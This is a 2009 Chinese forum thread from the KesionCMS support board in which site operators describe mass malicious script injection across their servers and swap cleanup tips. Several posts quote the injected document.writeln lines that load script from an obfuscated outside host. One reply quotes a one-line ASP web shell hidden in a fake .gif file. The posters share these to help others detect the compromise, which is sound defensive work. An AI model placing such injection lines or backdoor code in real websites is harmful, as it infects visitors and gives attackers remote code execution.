账号通
    

账号  

密码  

4366

查看

16

回复
主题:挂马给我带来重大的打击 [收藏主题] 转到:  
snpfiwfn 当前离线

176

主题

0

广播

0

粉丝
添加关注
级别:一年级

用户积分:2394 分
登录次数:142 次
注册时间:2008/6/23
最后登录:2011/5/18
snpfiwfn 发表于:2009/10/2 4:59:00   | 只看该作者 查看该作者主题 楼主 

我人生的一个转折点又一次改变了,先声明,我不是怪科讯系统,系统是挺好的。

我一直从事服务器安全维护这个行业,一直用科讯做站。对网站安全性一直很重视.

一个月纯收入有十万以上。

这次挂马事件,导至我七个服务器完全被挂完,挂得一个不留,数据太多了,也没打算清理了。

这次挂的马也怪。JS html 全挂上了。

 

 

document.writeln('<script id="scr7ipt5552" type="text/javascript" src="http://pt928.99%36%36.org" language="JavaScript"  ><\/script>');

document.writeln('<script language="JavaScript" src="http://pt%3928.%39%3966.org" type="text/javascript" id="scr7ipt938"  ><\/script>');

document.writeln('<script language="JavaScript" type="text/javascript" id="scr7ipt264" src="http://pt%3928.%39%3966.org"  ><\/script>');

document.writeln('<script language="JavaScript" id="scr7ipt3172" src="http://pt92%38.9966.org" type="text/javascript"  ><\/script>');


document.writeln('<script type="text/javascript" language="JavaScript" src="http://pt92%38.9966.org" id="scr7ipt5134"  ><\/script>');

document.writeln('<script language="JavaScript" type="text/javascript" src="http://pt928%2E9966%2Eorg" id="scr7ipt987"  ><\/script>');

document.writeln('<script language="JavaScript" src="http://pt928.99%36%36.org" type="text/javascript" id="scr7ipt2188"  ><\/script>');

document.writeln('<script language="JavaScript" id="scr7ipt4427" src="http://pt928%2E9966%2Eorg" type="text/javascript"  ><\/script>');


document.writeln('<script language="JavaScript" type="text/javascript" src="http://%70t928.9966.org" id="scr7ipt1629"  ><\/script>');


document.writeln('<script language="JavaScript" type="text/javascript" src="http://pt%3928.%39%3966.org" id="scr7ipt7790"  ><\/script>');

 

 

 

这是一部分JS挂的。 代码不断变化。批量清都不知道咱清了。如有高手来靠之办法。愿意以各种渠道酬谢.

 

 

如有高手。请发信到这个号的邮箱 兄弟。感谢不尽。

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
0206ljc 当前离线

19

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:561 分
登录次数:31 次
注册时间:2008/11/17
最后登录:2012/7/18
0206ljc 发表于:2009/10/4 17:28:00   | 只看该作者 查看该作者主题 沙发 
科汛在线网校系统

我也是一样,,有没好的办法解决

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
snpfiwfn 当前离线

176

主题

0

广播

0

粉丝
添加关注
级别:一年级

用户积分:2394 分
登录次数:142 次
注册时间:2008/6/23
最后登录:2011/5/18
snpfiwfn 发表于:2009/10/2 23:26:00   | 只看该作者 查看该作者主题 藤椅 
科汛智能建站系统

在这里。我特别感谢一下 ID为 liu123456  为我解决了痛苦。

 

这个兄弟。希望。你留下你的联系方式。

 

兄弟。我在线等你。

兄弟。我在线等你。

兄弟。我在线等你。

兄弟。我在线等你。

 

 

iu123456 这个ID的朋友。请留下联系方式

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
zhouggan 当前离线

31

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:744 分
登录次数:50 次
注册时间:2007/11/18
最后登录:2012/12/11
zhouggan 发表于:2009/10/2 20:40:00   | 只看该作者 查看该作者主题 板凳 
科汛智能建站系统

反正保留数据库我是试了的。估计不行。看情况了。我准备不更新了。如果再这么下去。就让其死掉算了。心力全失了

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
huangtudi 当前离线

24

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:239 分
登录次数:7 次
注册时间:2009/9/11
最后登录:2010/3/23
huangtudi 发表于:2009/10/2 19:41:00   | 只看该作者 查看该作者主题 报纸 
科汛在线考试系统(NET)

 

同情你,我能理解,我的2个网站也一样中招了,跟你说的一样。日放马的。

 

 

 

我清理的办法是,在线清理根目录下所有“.org” ,可暂时阻止脚本的运行,网站暂时可以运行,可应急, 但解决不了实质。

 

具体方法:http://bbs.kesion.com/dispbbs.asp?boardid=41&Id=97763&page=2

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
ys001 当前离线

55

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:654 分
登录次数:17 次
注册时间:2009/4/3
最后登录:2009/10/4
ys001 发表于:2009/10/4 20:19:00   | 只看该作者 查看该作者主题 地板 

实在是有些伤心了,整了几次了,我的流量全没了!

 

准备改换门庭,投入PHP的怀抱,linux服务器,至少安全性上好一些。

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
dongri888 当前离线

504

主题

2

广播

2

粉丝
添加关注
级别:五年级

用户积分:13121 分
登录次数:779 次
注册时间:2008/12/15
最后登录:2015/6/3
dongri888 发表于:2009/10/4 20:10:00   | 只看该作者 查看该作者主题 7楼 
科汛在线商城系统(NET)
你那样是没有用的。 。因为你的网站目录下有后门木马的。。。 可能是什么XXXXXX.ASP,GIF 等。。。 你用IIS日志就可以查到的。 你查时看一下IIS里的POST命令。。
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
cn2009 当前离线

1515

主题

3

广播

2

粉丝
添加关注
级别:高一年

用户积分:6151 分
登录次数:170 次
注册时间:2008/12/28
最后登录:2020/9/8
cn2009 发表于:2009/10/2 21:58:00   | 只看该作者 查看该作者主题 8楼 
科汛智能建站系统
月纯收入十万以上,年纯收入可就百万以上了,羡慕,建议大老板聘请几位高人全部手工检查源文件。保证你搞定。
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
gyxin123 当前离线

1204

主题

0

广播

0

粉丝
添加关注
级别:九年级

用户积分:9198 分
登录次数:441 次
注册时间:2007/12/23
最后登录:2012/10/16
gyxin123 发表于:2009/10/2 19:02:00   | 只看该作者 查看该作者主题 9楼 
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
kkwd 当前离线

40

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:446 分
登录次数:15 次
注册时间:2007/9/15
最后登录:2009/10/3
kkwd 发表于:2009/10/2 18:39:00   | 只看该作者 查看该作者主题 10楼 
做在线知识付费 选科汛云开店

木马代码如下:


勿点击链接.


代码1:


 <script src="http://pt928%2E9966%2Eorg" type="text/javascript" language="JavaScript" id="scr7ipt8823"  ></script>


 


代码2:



document.writeln('<script type="text/javascript" language="JavaScript" src="http://pt%3928.%39%3966.org" id="scr7ipt3680"  ><\/script>');


 


大家要特别注意每个文件夹下是否有 [  289582993.asp;.gif  ] 这个文件,编号可能是随机的.它不是图片文件,而是小马,只要有它可以肯定是木马了,用右键--编辑--记事本打开,可以看到<%execute request(chr(35))%>代码,即使你用正则替换了代码,也没有用,这个小马是个桥梁,黑客还可以继续上传大马的.记住一定检查一下,干掉它.

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
<上一主题 | 下一主题 >
Powered By KesionCMS Version X1
厦门科汛软件有限公司 © 2006-2016 页面执行1.92969秒 powered by KesionCMS 9.0